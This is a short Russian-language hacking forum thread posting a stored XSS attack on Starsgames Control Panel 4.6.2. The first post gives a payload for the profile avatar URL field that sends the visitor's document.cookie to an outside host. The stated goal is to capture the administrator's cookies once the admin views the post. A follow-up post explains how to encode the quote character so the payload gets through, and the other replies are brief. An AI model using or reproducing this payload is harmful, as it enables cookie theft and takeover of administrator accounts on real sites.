Форумы Starsgames Control Panel 4.6.2 new xss

Discussion in 'Уязвимости CMS/форумов' started by hacker4all, 19 Sep 2008.

  1. hacker4all

    hacker4all New Member

    Joined:
    29 Apr 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    В профиле где просит ввести адрес аватарки пишем
    PHP:
    "><img src=javascript:document.images[12].src='http://na-s.ru/images/hacker4all_1.gif?'+document.cookie;><"
    Постим где нибудь что бы админ заметил и куки наши :)

    Боян но все же... ;)
     
    #1 hacker4all, 19 Sep 2008
  2. hacker4all

    hacker4all New Member

    Joined:
    29 Apr 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    ' - заменить на
    HTML:
    & #039 ;
    без пробелов ))))
     
    #2 hacker4all, 19 Sep 2008
    Last edited: 19 Sep 2008
  3. Shum

    Shum New Member

    Joined:
    31 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ясно!!!спс
     
    #3 Shum, 5 Jan 2009
  4. waik

    waik Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    405
    Likes Received:
    163
    Reputations:
    12
    не понял что и менно замаенит ь
     
    #4 waik, 5 Jan 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.